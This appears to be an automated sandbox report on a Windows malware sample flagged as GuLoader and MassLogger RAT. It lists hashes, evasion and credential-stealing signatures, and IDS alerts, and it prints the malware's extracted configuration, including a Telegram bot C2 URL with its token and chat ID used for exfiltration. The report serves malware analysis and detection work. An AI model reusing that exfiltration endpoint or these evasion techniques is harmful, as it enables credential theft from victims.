Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
v4nrZtP7K2.exe

Overview

General Information

Sample name:v4nrZtP7K2.exe
renamed because original name is a hash value
Original sample name:fdf9354cf20fb94544d6bafaa777e8a40eba2d603e648b3dbdf35344d639b19d.exe
Analysis ID:1588131
MD5:0f45bbafc276fa80464c8892ba6f5b2a
SHA1:3f0ec83b231cf0ba0a1fee3696e709bc75d199eb
SHA256:fdf9354cf20fb94544d6bafaa777e8a40eba2d603e648b3dbdf35344d639b19d
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • v4nrZtP7K2.exe (PID: 1704 cmdline: "C:\Users\user\Desktop\v4nrZtP7K2.exe" MD5: 0F45BBAFC276FA80464C8892BA6F5B2A)
    • v4nrZtP7K2.exe (PID: 4256 cmdline: "C:\Users\user\Desktop\v4nrZtP7K2.exe" MD5: 0F45BBAFC276FA80464C8892BA6F5B2A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000001.00000002.2034874444.0000000003C88000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: v4nrZtP7K2.exe PID: 4256JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:18.295718+010020577441Malware Command and Control Activity Detected192.168.2.949740149.154.167.220443TCP
            2025-01-10T21:41:20.550220+010020577441Malware Command and Control Activity Detected192.168.2.949757149.154.167.220443TCP
            2025-01-10T21:41:22.413988+010020577441Malware Command and Control Activity Detected192.168.2.949769149.154.167.220443TCP
            2025-01-10T21:41:24.243171+010020577441Malware Command and Control Activity Detected192.168.2.949782149.154.167.220443TCP
            2025-01-10T21:41:26.308224+010020577441Malware Command and Control Activity Detected192.168.2.949798149.154.167.220443TCP
            2025-01-10T21:41:28.116897+010020577441Malware Command and Control Activity Detected192.168.2.949811149.154.167.220443TCP
            2025-01-10T21:41:29.905652+010020577441Malware Command and Control Activity Detected192.168.2.949827149.154.167.220443TCP
            2025-01-10T21:41:31.772274+010020577441Malware Command and Control Activity Detected192.168.2.949839149.154.167.220443TCP
            2025-01-10T21:41:33.621335+010020577441Malware Command and Control Activity Detected192.168.2.949853149.154.167.220443TCP
            2025-01-10T21:41:35.475737+010020577441Malware Command and Control Activity Detected192.168.2.949865149.154.167.220443TCP
            2025-01-10T21:41:37.261635+010020577441Malware Command and Control Activity Detected192.168.2.949877149.154.167.220443TCP
            2025-01-10T21:41:39.030142+010020577441Malware Command and Control Activity Detected192.168.2.949890149.154.167.220443TCP
            2025-01-10T21:41:40.935980+010020577441Malware Command and Control Activity Detected192.168.2.949905149.154.167.220443TCP
            2025-01-10T21:41:42.794589+010020577441Malware Command and Control Activity Detected192.168.2.949919149.154.167.220443TCP
            2025-01-10T21:41:44.714132+010020577441Malware Command and Control Activity Detected192.168.2.949930149.154.167.220443TCP
            2025-01-10T21:41:47.640280+010020577441Malware Command and Control Activity Detected192.168.2.949946149.154.167.220443TCP
            2025-01-10T21:41:49.647010+010020577441Malware Command and Control Activity Detected192.168.2.949962149.154.167.220443TCP
            2025-01-10T21:41:51.526150+010020577441Malware Command and Control Activity Detected192.168.2.949973149.154.167.220443TCP
            2025-01-10T21:41:53.376503+010020577441Malware Command and Control Activity Detected192.168.2.949988149.154.167.220443TCP
            2025-01-10T21:41:55.153990+010020577441Malware Command and Control Activity Detected192.168.2.950001149.154.167.220443TCP
            2025-01-10T21:41:56.893527+010020577441Malware Command and Control Activity Detected192.168.2.950014149.154.167.220443TCP
            2025-01-10T21:41:58.883067+010020577441Malware Command and Control Activity Detected192.168.2.950022149.154.167.220443TCP
            2025-01-10T21:42:00.709410+010020577441Malware Command and Control Activity Detected192.168.2.950024149.154.167.220443TCP
            2025-01-10T21:42:03.304992+010020577441Malware Command and Control Activity Detected192.168.2.950026149.154.167.220443TCP
            2025-01-10T21:42:05.344060+010020577441Malware Command and Control Activity Detected192.168.2.950028149.154.167.220443TCP
            2025-01-10T21:42:07.250403+010020577441Malware Command and Control Activity Detected192.168.2.950030149.154.167.220443TCP
            2025-01-10T21:42:09.956106+010020577441Malware Command and Control Activity Detected192.168.2.950032149.154.167.220443TCP
            2025-01-10T21:42:11.868333+010020577441Malware Command and Control Activity Detected192.168.2.950034149.154.167.220443TCP
            2025-01-10T21:42:13.974062+010020577441Malware Command and Control Activity Detected192.168.2.950036149.154.167.220443TCP
            2025-01-10T21:42:15.775576+010020577441Malware Command and Control Activity Detected192.168.2.950038149.154.167.220443TCP
            2025-01-10T21:42:17.647059+010020577441Malware Command and Control Activity Detected192.168.2.950040149.154.167.220443TCP
            2025-01-10T21:42:20.575719+010020577441Malware Command and Control Activity Detected192.168.2.950042149.154.167.220443TCP
            2025-01-10T21:42:25.228901+010020577441Malware Command and Control Activity Detected192.168.2.950044149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:10.679332+010028032742Potentially Bad Traffic192.168.2.949711132.226.8.16980TCP
            2025-01-10T21:41:17.366602+010028032742Potentially Bad Traffic192.168.2.949711132.226.8.16980TCP
            2025-01-10T21:41:19.616728+010028032742Potentially Bad Traffic192.168.2.949750132.226.8.16980TCP
            2025-01-10T21:42:13.132415+010028032742Potentially Bad Traffic192.168.2.950035132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:04.055782+010028032702Potentially Bad Traffic192.168.2.949709142.250.181.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T21:41:17.999582+010018100081Potentially Bad Traffic192.168.2.949740149.154.167.220443TCP
            2025-01-10T21:41:20.221607+010018100081Potentially Bad Traffic192.168.2.949757149.154.167.220443TCP
            2025-01-10T21:41:22.080335+010018100081Potentially Bad Traffic192.168.2.949769149.154.167.220443TCP
            2025-01-10T21:41:23.902379+010018100081Potentially Bad Traffic192.168.2.949782149.154.167.220443TCP
            2025-01-10T21:41:25.754752+010018100081Potentially Bad Traffic192.168.2.949798149.154.167.220443TCP
            2025-01-10T21:41:27.821372+010018100081Potentially Bad Traffic192.168.2.949811149.154.167.220443TCP
            2025-01-10T21:41:29.651156+010018100081Potentially Bad Traffic192.168.2.949827149.154.167.220443TCP
            2025-01-10T21:41:31.373410+010018100081Potentially Bad Traffic192.168.2.949839149.154.167.220443TCP
            2025-01-10T21:41:33.258256+010018100081Potentially Bad Traffic192.168.2.949853149.154.167.220443TCP
            2025-01-10T21:41:35.078882+010018100081Potentially Bad Traffic192.168.2.949865149.154.167.220443TCP
            2025-01-10T21:41:37.005576+010018100081Potentially Bad Traffic192.168.2.949877149.154.167.220443TCP
            2025-01-10T21:41:38.759064+010018100081Potentially Bad Traffic192.168.2.949890149.154.167.220443TCP
            2025-01-10T21:41:40.507479+010018100081Potentially Bad Traffic192.168.2.949905149.154.167.220443TCP
            2025-01-10T21:41:42.455994+010018100081Potentially Bad Traffic192.168.2.949919149.154.167.220443TCP
            2025-01-10T21:41:44.380265+010018100081Potentially Bad Traffic192.168.2.949930149.154.167.220443TCP
            2025-01-10T21:41:46.567194+010018100081Potentially Bad Traffic192.168.2.949946149.154.167.220443TCP
            2025-01-10T21:41:49.400542+010018100081Potentially Bad Traffic192.168.2.949962149.154.167.220443TCP
            2025-01-10T21:41:51.084566+010018100081Potentially Bad Traffic192.168.2.949973149.154.167.220443TCP
            2025-01-10T21:41:52.988544+010018100081Potentially Bad Traffic192.168.2.949988149.154.167.220443TCP
            2025-01-10T21:41:54.843402+010018100081Potentially Bad Traffic192.168.2.950001149.154.167.220443TCP
            2025-01-10T21:41:56.646970+010018100081Potentially Bad Traffic192.168.2.950014149.154.167.220443TCP
            2025-01-10T21:41:58.410818+010018100081Potentially Bad Traffic192.168.2.950022149.154.167.220443TCP
            2025-01-10T21:42:00.462252+010018100081Potentially Bad Traffic192.168.2.950024149.154.167.220443TCP
            2025-01-10T21:42:02.832012+010018100081Potentially Bad Traffic192.168.2.950026149.154.167.220443TCP
            2025-01-10T21:42:04.799457+010018100081Potentially Bad Traffic192.168.2.950028149.154.167.220443TCP
            2025-01-10T21:42:07.009354+010018100081Potentially Bad Traffic192.168.2.950030149.154.167.220443TCP
            2025-01-10T21:42:09.621156+010018100081Potentially Bad Traffic192.168.2.950032149.154.167.220443TCP
            2025-01-10T21:42:11.534767+010018100081Potentially Bad Traffic192.168.2.950034149.154.167.220443TCP
            2025-01-10T21:42:13.713057+010018100081Potentially Bad Traffic192.168.2.950036149.154.167.220443TCP
            2025-01-10T21:42:15.429818+010018100081Potentially Bad Traffic192.168.2.950038149.154.167.220443TCP
            2025-01-10T21:42:17.260407+010018100081Potentially Bad Traffic192.168.2.950040149.154.167.220443TCP
            2025-01-10T21:42:20.136836+010018100081Potentially Bad Traffic192.168.2.950042149.154.167.220443TCP
            2025-01-10T21:42:24.950422+010018100081Potentially Bad Traffic192.168.2.950044149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: v4nrZtP7K2.exeAvira: detected
            Source: 00000005.00000002.2943654108.000000003487B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: v4nrZtP7K2.exe.4256.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Source: v4nrZtP7K2.exeReversingLabs: Detection: 63%
            Source: v4nrZtP7K2.exeVirustotal: Detection: 77%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694D1EC CryptUnprotectData,5_2_3694D1EC
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_3694D9D9 CryptUnprotectData,5_2_3694D9D9
            Source: v4nrZtP7K2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.9:49713 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.9:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49740 version: TLS 1.2
            Source: v4nrZtP7K2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_0040672B FindFirstFileW,FindClose,1_2_0040672B
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405AFA
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 1_2_00402868 FindFirstFileW,1_2_00402868
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_0040672B FindFirstFileW,FindClose,5_2_0040672B
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 5_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405AFA
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694C985h5_2_3694C638
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 36941042h5_2_36940C28
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 36940671h5_2_369403AF
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694E198h5_2_3694DEE1
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694EA48h5_2_3694E79E
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 36941042h5_2_36940F6F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694B791h5_2_3694B4EC
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 36941042h5_2_36940C1A
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694C041h5_2_3694BD88
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694DD40h5_2_3694DA89
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694EEA0h5_2_3694EBF6
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694E5F0h5_2_3694E339
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694F2F8h5_2_3694F042
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694B339h5_2_3694B07F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694C499h5_2_3694C1F2
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3694BBE9h5_2_3694B944
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37606A68h5_2_376067C0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 3760882Dh5_2_37608650
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 376091B7h5_2_37608650
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then push 00000000h5_2_3760BDF0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37604218h5_2_37603F70
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 376061B8h5_2_37605F10
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37601250h5_2_37600FA8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37605908h5_2_37605660
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 376030B8h5_2_37602E10
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37603968h5_2_376036C0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37602808h5_2_37602560
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37605058h5_2_37604DB0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 376016A8h5_2_37601400
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37606EC0h5_2_37606C18
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37607770h5_2_376074C8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37601F58h5_2_37601CB0
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37606610h5_2_37606368
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_37608373
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_37607B4F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37603DC0h5_2_37603B18
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_3760CBE7
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37604670h5_2_376043C8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37603510h5_2_37603268
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 376054B0h5_2_37605208
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37605D60h5_2_37605AB8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then push 00000000h5_2_3760C92F
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 376023B0h5_2_37602108
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37602C60h5_2_376029B8
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_37608193
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37607318h5_2_37607070
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37601B00h5_2_37601858
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then jmp 37604ACAh5_2_37604820
            Source: C:\Users\user\Desktop\v4nrZtP7K2.exeCode function: 4x nop then push 00000000h5_2_37A3E790

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49769 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49769 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49839 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49839 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49877 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49740 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49740 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49877 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49811 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49930 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49930 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49962 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49811 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49962 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50026 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49865 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49865 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49890 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49890 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50042 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49905 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49757 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49757 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49853 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49853 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50040 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49827 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49782 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49782 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49798 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49798 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49988 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50032 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49973 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49973 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50022 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50001 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49905 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49827 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49919 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49919 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50014 -> 149.154.167.220:443
